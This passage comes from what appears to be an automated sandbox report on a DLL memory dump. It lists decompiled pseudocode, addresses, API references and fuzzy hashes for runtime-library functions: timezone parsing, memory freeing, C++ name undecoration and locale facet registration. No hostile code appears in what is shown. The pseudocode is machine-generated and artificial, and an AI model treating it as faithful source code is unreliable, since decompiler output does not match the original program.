								_t120 = E6D4E3B33(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E6D4CBFB3(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E6D4CBFB3(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E6D4CBFB3(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E6D4D8225()) = _v8;
										_t128 = E6D4D8219();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E6D4E3B33(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t169;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L83;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L83:
			}

0x6d4d877c
0x6d4d8786
0x6d4d878b
0x6d4d878f
0x6d4d8791
0x6d4d8799
0x6d4d87a4
0x6d4d8944
0x6d4d8946
0x6d4d8947
0x6d4d8948
0x6d4d8949
0x6d4d894a
0x6d4d894b
0x6d4d8950
0x6d4d8954
0x6d4d8956
0x6d4d8959
0x6d4d8960
0x6d4d8964
0x6d4d8967
0x6d4d896b
0x6d4d896e
0x6d4d8971
0x6d4d8976
0x6d4d8977
0x6d4d8979
0x6d4d8aa1
0x6d4d8aa1
0x6d4d8aa2
0x6d4d8aa3
0x6d4d8aa4
0x6d4d8aa5
0x6d4d8aa6
0x6d4d8aab
0x6d4d8aae
0x6d4d8aaf
0x6d4d8ab7
0x6d4d8abe
0x6d4d8ac1
0x6d4d8ace
0x6d4d8ad5
0x6d4d8ad6
0x6d4d8ad7
0x6d4d8add
0x6d4d8aec
0x6d4d8af3
0x6d4d8afb
0x6d4d8afd
0x6d4d8b07
0x6d4d8b0a
0x6d4d8b17
0x6d4d8b1a
0x6d4d8b1c
0x6d4d8b35
0x6d4d8b3d
0x6d4d8b3f
0x6d4d8b45
0x6d4d8b4a
0x6d4d8b41
0x6d4d8b41
0x00000000
0x6d4d8b41
0x6d4d8b1e
0x6d4d8b1e
0x6d4d8b1f
0x6d4d8b1f
0x6d4d8b1f
0x6d4d8b4c
0x6d4d8aff
0x6d4d8aff
0x6d4d8aff
0x6d4d8b59
0x6d4d8b5b
0x6d4d8b5d
0x6d4d8b5f
0x6d4d8b6f
0x6d4d8b6f
0x6d4d8b61
0x6d4d8b61
0x6d4d8b64
0x00000000
0x6d4d8b66
0x6d4d8b66
0x6d4d8b67
0x6d4d8b6c
0x6d4d8b64
0x6d4d8b75
0x6d4d8b80
0x6d4d8b8b
0x6d4d897f
0x6d4d8983
0x6d4d8988
0x6d4d8989
0x6d4d898b
0x00000000
0x6d4d8991
0x6d4d8995
0x6d4d899a
0x6d4d899b
0x6d4d899d
0x00000000
0x6d4d89a3
0x6d4d89a9
0x6d4d89ae
0x6d4d89b4
0x6d4d89bb
0x6d4d89c1
0x6d4d89c4
0x6d4d89ca
0x6d4d89d1
0x6d4d89d7
0x6d4d89db
0x6d4d89e1
0x6d4d89e4
0x6d4d89eb
0x6d4d89f0
0x6d4d89f0
0x6d4d89f2
0x6d4d89f2
0x6d4d89f5
0x6d4d89fc
0x6d4d8a14
0x6d4d8a14
0x6d4d8a17
0x6d4d89fe
0x6d4d89fe
0x6d4d8a03
0x6d4d8a05
0x00000000
0x6d4d8a07
0x6d4d8a09
0x6d4d8a0f
0x6d4d8a0f
0x6d4d8a05
0x6d4d8a1f
0x6d4d8a33
0x6d4d8a39
0x6d4d8a3b
0x6d4d8a49
0x6d4d8a4b
0x6d4d8a3d
0x6d4d8a3d
0x6d4d8a40
0x00000000
0x6d4d8a42
0x6d4d8a44
0x6d4d8a44
0x6d4d8a40
0x6d4d8a60
0x6d4d8a67
0x6d4d8a69
0x6d4d8a78
0x6d4d8a7b
0x6d4d8a6b
0x6d4d8a6b
0x6d4d8a6e
0x00000000
0x6d4d8a70
0x6d4d8a73
0x6d4d8a73
0x6d4d8a6e
0x6d4d8a69
0x6d4d8a85
0x6d4d8a8f
0x6d4d8a94
0x6d4d8a99
0x6d4d8aa0
0x6d4d8aa0
0x6d4d899d
0x6d4d898b
0x6d4d87bc
0x6d4d87bc
0x6d4d87c2
0x6d4d87c7
0x6d4d87fd
0x6d4d87fe
0x6d4d8804
0x6d4d8806
0x6d4d8806
0x6d4d8809
0x6d4d8809
0x6d4d880b
0x6d4d880c
0x6d4d8812
0x6d4d881d
0x6d4d8822
0x6d4d8827
0x6d4d8831
0x00000000
0x6d4d8837
0x6d4d8837
0x6d4d8839
0x6d4d883a
0x6d4d883a
0x6d4d883d
0x6d4d883d
0x6d4d883f
0x6d4d8840
0x6d4d8847
0x6d4d884c
0x6d4d8851
0x6d4d8856
0x6d4d885e
0x6d4d885f
0x6d4d8865
0x6d4d886a
0x6d4d886f
0x6d4d8875
0x6d4d887a
0x6d4d887b
0x6d4d887e
0x00000000
0x00000000
0x00000000
0x6d4d887e
0x6d4d8883
0x6d4d8884
0x6d4d8889
0x6d4d888b
0x6d4d888b
0x6d4d8893
0x6d4d8899
0x6d4d889c
0x6d4d889c
0x6d4d88a0
0x00000000
0x00000000
0x6d4d88aa
0x6d4d88aa
0x6d4d88ad
0x6d4d88b0
0x6d4d88b2
0x6d4d88c0
0x6d4d88c2
0x6d4d88cc
0x6d4d88cc
0x6d4d88ce
0x6d4d88d0
0x00000000
0x00000000
0x6d4d88c7
0x6d4d88c9
0x6d4d88cb
0x6d4d88cb
0x00000000
0x6d4d88cb
0x00000000
0x6d4d88c9
0x6d4d88d2
0x6d4d88d5
0x6d4d88d7
0x6d4d88e2
0x6d4d88e4
0x6d4d88ee
0x6d4d88ee
0x6d4d88f0
0x6d4d88f2
0x00000000
0x00000000
0x6d4d88e9
0x6d4d88eb
0x6d4d88ed
0x6d4d88ed
0x00000000
0x6d4d88ed
0x00000000
0x6d4d88eb
0x6d4d88ee
0x6d4d88d5
0x6d4d88f4
0x6d4d88f4
0x6d4d88f6
0x6d4d88fa
0x6d4d88fa
0x6d4d88ff
0x6d4d8901
0x6d4d8904
0x6d4d8907
0x6d4d8909
0x6d4d890c
0x6d4d8924
0x6d4d8927
0x6d4d892a
0x6d4d8932
0x6d4d8937
0x6d4d893c
0x00000000
0x6d4d893c
0x6d4d890e
0x6d4d8913
0x6d4d8916
0x6d4d891b
0x6d4d891e
0x6d4d8920
0x00000000
0x00000000
0x6d4d8922
0x6d4d886f
0x00000000
0x6d4d8856
0x6d4d87c9
0x6d4d87c9
0x6d4d87cb
0x6d4d87cd
0x6d4d87cd
0x6d4d87d1
0x00000000
0x00000000
0x6d4d87d5
0x6d4d87e9
0x6d4d87e9
0x6d4d87d7
0x6d4d87d7
0x6d4d87d7
0x6d4d87dd
0x00000000
0x6d4d87df
0x6d4d87df
0x6d4d87e2
0x6d4d87e7
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4d87e7
0x6d4d87dd
0x6d4d87f2
0x6d4d87f4
0x6d4d8943
0x6d4d8943
0x6d4d87fa
0x6d4d87fa
0x00000000
0x6d4d87fa
0x00000000
0x6d4d87f4
0x6d4d87ed
0x6d4d87ef
0x6d4d87ef
0x00000000
0x6d4d87ef
0x6d4d87c7
0x00000000

APIs

_free.LIBCMT ref: 6D4D87FE
_free.LIBCMT ref: 6D4D8822
_free.LIBCMT ref: 6D4D89A9
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6D4F2130), ref: 6D4D89BB
WideCharToMultiByte.KERNEL32(00000000,00000000,6D547A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6D4D8A33
WideCharToMultiByte.KERNEL32(00000000,00000000,6D547A70,000000FF,?,0000003F,00000000,?), ref: 6D4D8A60
_free.LIBCMT ref: 6D4D8B75

Strings

0!Om, xrefs: 6D4D8AD8
0!Om, xrefs: 6D4D8964, 6D4D896A

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: 0!Om$0!Om
API String ID: 314583886-1120582717
Opcode ID: 7e81a4081ff5f2b2c10bc969ec2a0299400b18bf69440b4ba8fd8a67a9de303f
Instruction ID: 874b308c6cb711a4aee1c17743a3b777b596c311376be4b98ffdcc0b3f4aeada
Opcode Fuzzy Hash: 7e81a4081ff5f2b2c10bc969ec2a0299400b18bf69440b4ba8fd8a67a9de303f
Instruction Fuzzy Hash: 32C14371908246AFDB41DF698C60FBABBB9EF42314F25509EE59097341E7308E41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CD3EF, Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D4CD3EF(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x6d4f0c10) {
					E6D4CCBD3(_t52);
					_t26 = _a4;
				}
				E6D4CCBD3( *((intOrPtr*)(_t26 + 0x3c)));
				E6D4CCBD3( *((intOrPtr*)(_a4 + 0x30)));
				E6D4CCBD3( *((intOrPtr*)(_a4 + 0x34)));
				E6D4CCBD3( *((intOrPtr*)(_a4 + 0x38)));
				E6D4CCBD3( *((intOrPtr*)(_a4 + 0x28)));
				E6D4CCBD3( *((intOrPtr*)(_a4 + 0x2c)));
				E6D4CCBD3( *((intOrPtr*)(_a4 + 0x40)));
				E6D4CCBD3( *((intOrPtr*)(_a4 + 0x44)));
				E6D4CCBD3( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E6D4CD23E(5,  &_v8);
				_v8 =  &_a4;
				return E6D4CD28E(4,  &_v8);
			}

0x6d4cd3f5
0x6d4cd3f8
0x6d4cd400
0x6d4cd403
0x6d4cd408
0x6d4cd40b
0x6d4cd40f
0x6d4cd41a
0x6d4cd425
0x6d4cd430
0x6d4cd43b
0x6d4cd446
0x6d4cd451
0x6d4cd45c
0x6d4cd46a
0x6d4cd472
0x6d4cd47b
0x6d4cd483
0x6d4cd497

APIs

_free.LIBCMT ref: 6D4CD403

Part of subcall function 6D4CCBD3: HeapFree.KERNEL32(00000000,00000000,?,6D4DCFAF,00000000,00000000,00000000,00000000,?,6D4DD2B4,00000000,00000007,00000000,?,6D4DC0FC,00000000), ref: 6D4CCBE9
Part of subcall function 6D4CCBD3: GetLastError.KERNEL32(00000000,?,6D4DCFAF,00000000,00000000,00000000,00000000,?,6D4DD2B4,00000000,00000007,00000000,?,6D4DC0FC,00000000,00000000), ref: 6D4CCBFB

_free.LIBCMT ref: 6D4CD40F
_free.LIBCMT ref: 6D4CD41A
_free.LIBCMT ref: 6D4CD425
_free.LIBCMT ref: 6D4CD430
_free.LIBCMT ref: 6D4CD43B
_free.LIBCMT ref: 6D4CD446
_free.LIBCMT ref: 6D4CD451
_free.LIBCMT ref: 6D4CD45C
_free.LIBCMT ref: 6D4CD46A

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 543e01b92c3d19d6410854883f4826c013043d61eb47dcf96ecb754274df2998
Instruction ID: 1dabfc460e9ad6684273c570cdebddbb70d841b430b7b54c9abff2d1a8e017c9
Opcode Fuzzy Hash: 543e01b92c3d19d6410854883f4826c013043d61eb47dcf96ecb754274df2998
Instruction Fuzzy Hash: BD11BC7954810CBFCB01DF94D840DDA3B76EF44254B1240A9BA084F126E775DE609BC2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A70E2, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E6D4A70E2(void* __ecx, void* __edx, signed int* _a4) {
				intOrPtr _v8;
				char _v12;
				char* _t18;
				unsigned int _t23;
				char* _t26;
				intOrPtr* _t29;
				intOrPtr* _t30;
				unsigned int _t33;
				char* _t36;
				signed int* _t38;
				void* _t41;
				intOrPtr _t47;
				intOrPtr _t50;

				_t18 =  *0x6d547218; // 0x0
				_t41 =  *_t18 - 0x58;
				if(_t41 == 0) {
					 *0x6d547218 = _t18 + 1;
					_push("void");
					goto L16;
				} else {
					if(_t41 == 0) {
						 *0x6d547218 = _t18 + 1;
						_t23 =  *0x6d547220; // 0x0
						_t26 = "...";
						if(( !(_t23 >> 0x12) & 0x00000001) == 0) {
							_t26 = "<ellipsis>";
						}
						_push(_t26);
						L16:
						E6D4A5A6C(_a4);
						goto L17;
					} else {
						E6D4A6FEC(__edx,  &_v12);
						_t50 = _v8;
						if(_t50 != 0) {
							L11:
							_t29 = _a4;
							 *_t29 = _v12;
							 *((intOrPtr*)(_t29 + 4)) = _t50;
							return _t29;
						} else {
							_t30 =  *0x6d547218; // 0x0
							_t47 =  *_t30;
							if(_t47 == 0) {
								goto L11;
							} else {
								if(_t47 == 0x40) {
									 *0x6d547218 = _t30 + 1;
									goto L11;
								} else {
									if(_t47 == 0x5a) {
										 *0x6d547218 = _t30 + 1;
										_t33 =  *0x6d547220; // 0x0
										_t36 = ",...";
										if(( !(_t33 >> 0x12) & 0x00000001) == 0) {
											_t36 = ",<ellipsis>";
										}
										E6D4A5EB7( &_v12, _a4, _t36);
										L17:
										return _a4;
									} else {
										_t38 = _a4;
										_t38[1] = _t38[1] & 0x00000000;
										 *_t38 =  *_t38 & 0x00000000;
										_t38[1] = 2;
										return _t38;
									}
								}
							}
						}
					}
				}
			}

0x6d4a70e7
0x6d4a70ef
0x6d4a70f2
0x6d4a7195
0x6d4a719a
0x00000000
0x6d4a70f8
0x6d4a70fc
0x6d4a7174
0x6d4a7179
0x6d4a7185
0x6d4a718a
0x6d4a718c
0x6d4a718c
0x6d4a7191
0x6d4a719f
0x6d4a71a2
0x00000000
0x6d4a70fe
0x6d4a7102
0x6d4a7107
0x6d4a710d
0x6d4a7166
0x6d4a7166
0x6d4a716c
0x6d4a716e
0x6d4a7172
0x6d4a710f
0x6d4a710f
0x6d4a7114
0x6d4a7118
0x00000000
0x6d4a711a
0x6d4a711d
0x6d4a7161
0x00000000
0x6d4a711f
0x6d4a7122
0x6d4a7135
0x6d4a713a
0x6d4a7146
0x6d4a714b
0x6d4a714d
0x6d4a714d
0x6d4a7159
0x6d4a71a7
0x6d4a71ab
0x6d4a7124
0x6d4a7124
0x6d4a7127
0x6d4a712b
0x6d4a712e
0x6d4a7133
0x6d4a7133
0x6d4a7122
0x6d4a711d
0x6d4a7118
0x6d4a710d
0x6d4a70fc

APIs

UnDecorator::getArgumentList.LIBVCRUNTIME ref: 6D4A7102

Part of subcall function 6D4A6FEC: Replicator::operator[].LIBVCRUNTIME ref: 6D4A7058
Part of subcall function 6D4A6FEC: DName::operator+=.LIBVCRUNTIME ref: 6D4A7060

DName::operator+.LIBCMT ref: 6D4A7159
DName::DName.LIBVCRUNTIME ref: 6D4A71A2

Strings

,..., xrefs: 6D4A7146
void, xrefs: 6D4A719A
<ellipsis>, xrefs: 6D4A718C, 6D4A7191
,<ellipsis>, xrefs: 6D4A714D, 6D4A7152
..., xrefs: 6D4A7185

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: eb8895d049d0116c32920d09feb8959098176babb342215634856f35f4bb7762
Instruction ID: 3cd20de1614c555013ba0167d8b3e93defab1f0af2fd4f4c0dcc1662e3dcf04c
Opcode Fuzzy Hash: eb8895d049d0116c32920d09feb8959098176babb342215634856f35f4bb7762
Instruction Fuzzy Hash: 41215870A08209AFDF14DB1CC490FAA7BF4EB16359F198158E845CB36AC731DE818BC1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48777F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D48777F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				void* _v16;
				char _v20;
				char _v32;
				void* _t19;
				intOrPtr* _t20;
				intOrPtr* _t42;
				void* _t50;

				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653( &_v20, 0);
				_t50 =  *0x6d546c10; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t50;
				_t19 = E6D46161C(0x6d546b2c);
				_t38 = _a8;
				_t20 = E6D46171B(_a8, _t19);
				_t48 = _t20;
				if(_t20 != 0) {
					L5:
					E6D4866BA( &_v20);
					return E6D4A0075(_t48);
				} else {
					if(_t50 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6D487E4C(__ebx, _t38, __edx, _t48, _t50) - 0xffffffff;
						if(__eflags == 0) {
							_t42 =  &_v32;
							E6D461438(_t42);
							E6D4A3D74( &_v32, 0x6d543504);
							asm("int3");
							 *_t42 = _v0;
							return _t42;
						} else {
							_t48 = _v16;
							_v16 = _t48;
							_v4 = 1;
							E6D486FD3(__eflags, _t48);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t48 + 4))))();
							 *0x6d546c10 = _t48;
							goto L5;
						}
					} else {
						_t48 = _t50;
						goto L5;
					}
				}
			}

0x6d487786
0x6d487790
0x6d487795
0x6d4877a0
0x6d4877a4
0x6d4877a7
0x6d4877ac
0x6d4877b0
0x6d4877b5
0x6d4877b9
0x6d4877fe
0x6d487801
0x6d48780d
0x6d4877bb
0x6d4877bd
0x6d4877c3
0x6d4877c9
0x6d4877d1
0x6d4877d4
0x6d48780e
0x6d487811
0x6d48781f
0x6d487824
0x6d48782b
0x6d487830
0x6d4877d6
0x6d4877d6
0x6d4877d9
0x6d4877dd
0x6d4877e1
0x6d4877ee
0x6d4877f6
0x6d4877f8
0x00000000
0x6d4877f8
0x6d4877bf
0x6d4877bf
0x00000000
0x6d4877bf
0x6d4877bd

APIs

__EH_prolog3.LIBCMT ref: 6D487786
std::_Lockit::_Lockit.LIBCPMT ref: 6D487790
int.LIBCPMT ref: 6D4877A7

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

codecvt.LIBCPMT ref: 6D4877CA
std::_Facet_Register.LIBCPMT ref: 6D4877E1
std::_Lockit::~_Lockit.LIBCPMT ref: 6D487801
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48781F

Strings

,kTm, xrefs: 6D48779B

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID: ,kTm
API String ID: 2594415655-1660317422
Opcode ID: 595939b3325d80c460828f8437d902800d1fc973c76e3dfd8be1a619ecf32615
Instruction ID: 0a46911ae70374ded11d20da0889841a6f50322ae0144f2b4c7c03f7d77723b0
Opcode Fuzzy Hash: 595939b3325d80c460828f8437d902800d1fc973c76e3dfd8be1a619ecf32615
Instruction Fuzzy Hash: C711B175E082199BCF05EB64C850EEDB7B5AF94314F2A4408E511A7391DFB0ED01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48EEEB, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D48EEEB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t321;
				signed int _t322;
				void* _t334;
				void* _t347;
				void* _t360;
				void* _t373;
				void* _t386;
				void* _t399;
				void* _t412;
				void* _t425;
				void* _t438;
				void* _t451;
				void* _t464;
				void* _t477;
				void* _t490;
				void* _t503;
				void* _t516;
				void* _t529;
				void* _t542;
				void* _t555;
				void* _t568;
				void* _t581;
				void* _t594;
				signed int _t853;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t949;
				signed int _t950;
				signed int _t951;
				signed int _t952;
				signed int _t953;
				signed int _t954;
				signed int _t955;
				signed int _t956;
				signed int _t957;
				signed int _t958;
				signed int _t959;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				void* _t990;

				_t920 = __edx;
				_t699 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t990 - 0x14, 0);
				_t945 =  *0x6d546e04; // 0x0
				 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
				 *(_t990 - 0x10) = _t945;
				_t321 = E6D46161C(0x6d546b30);
				_t702 =  *((intOrPtr*)(_t990 + 8));
				_t322 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t321);
				_t922 = _t322;
				if(_t322 != 0) {
					L5:
					E6D4866BA(_t990 - 0x14);
					return E6D4A0075(_t922);
				} else {
					if(_t945 == 0) {
						_push( *((intOrPtr*)(_t990 + 8)));
						_push(_t990 - 0x10);
						__eflags = E6D490C9D(__ebx, _t702, __edx, _t922, _t945) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t990 - 0x20);
							E6D4A3D74(_t990 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t922, _t945, 0x14);
							E6D486653(_t990 - 0x14, 0);
							_t946 =  *0x6d546de4; // 0x0
							 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
							 *(_t990 - 0x10) = _t946;
							_t334 = E6D46161C(0x6d546d90);
							_t709 =  *((intOrPtr*)(_t990 + 8));
							_t923 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t334);
							__eflags = _t923;
							if(_t923 != 0) {
								L12:
								E6D4866BA(_t990 - 0x14);
								return E6D4A0075(_t923);
							} else {
								__eflags = _t946;
								if(_t946 == 0) {
									_push( *((intOrPtr*)(_t990 + 8)));
									_push(_t990 - 0x10);
									__eflags = E6D490D03(_t699, _t709, __edx, _t923, _t946) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t990 - 0x20);
										E6D4A3D74(_t990 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t699, _t923, _t946, 0x14);
										E6D486653(_t990 - 0x14, 0);
										_t947 =  *0x6d546db4; // 0x0
										 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
										 *(_t990 - 0x10) = _t947;
										_t347 = E6D46161C(0x6d546d68);
										_t716 =  *((intOrPtr*)(_t990 + 8));
										_t924 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t347);
										__eflags = _t924;
										if(_t924 != 0) {
											L19:
											E6D4866BA(_t990 - 0x14);
											return E6D4A0075(_t924);
										} else {
											__eflags = _t947;
											if(_t947 == 0) {
												_push( *((intOrPtr*)(_t990 + 8)));
												_push(_t990 - 0x10);
												__eflags = E6D490DA5(_t699, _t716, __edx, _t924, _t947) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t990 - 0x20);
													E6D4A3D74(_t990 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t699, _t924, _t947, 0x14);
													E6D486653(_t990 - 0x14, 0);
													_t948 =  *0x6d546dd4; // 0x0
													 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
													 *(_t990 - 0x10) = _t948;
													_t360 = E6D46161C(0x6d546b28);
													_t723 =  *((intOrPtr*)(_t990 + 8));
													_t925 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t360);
													__eflags = _t925;
													if(_t925 != 0) {
														L26:
														E6D4866BA(_t990 - 0x14);
														return E6D4A0075(_t925);
													} else {
														__eflags = _t948;
														if(_t948 == 0) {
															_push( *((intOrPtr*)(_t990 + 8)));
															_push(_t990 - 0x10);
															__eflags = E6D490E47(_t699, _t723, _t920, _t925, _t948) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t990 - 0x20);
																E6D4A3D74(_t990 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t699, _t925, _t948, 0x14);
																E6D486653(_t990 - 0x14, 0);
																_t949 =  *0x6d546de8; // 0x0
																 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																 *(_t990 - 0x10) = _t949;
																_t373 = E6D46161C(0x6d546d94);
																_t730 =  *((intOrPtr*)(_t990 + 8));
																_t926 = E6D46171B( *((intOrPtr*)(_t990 + 8)), _t373);
																__eflags = _t926;
																if(_t926 != 0) {
																	L33:
																	E6D4866BA(_t990 - 0x14);
																	return E6D4A0075(_t926);
																} else {
																	__eflags = _t949;
																	if(_t949 == 0) {
																		_push( *((intOrPtr*)(_t990 + 8)));
																		_push(_t990 - 0x10);
																		__eflags = E6D490EB7(_t699, _t730, _t920, _t926, _t949) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t990 - 0x20);
																			E6D4A3D74(_t990 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t699, _t926, _t949, 0x14);
																			E6D486653(_t990 - 0x14, 0);
																			_t950 =  *0x6d546db8; // 0x0
																			 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																			 *(_t990 - 0x10) = _t950;
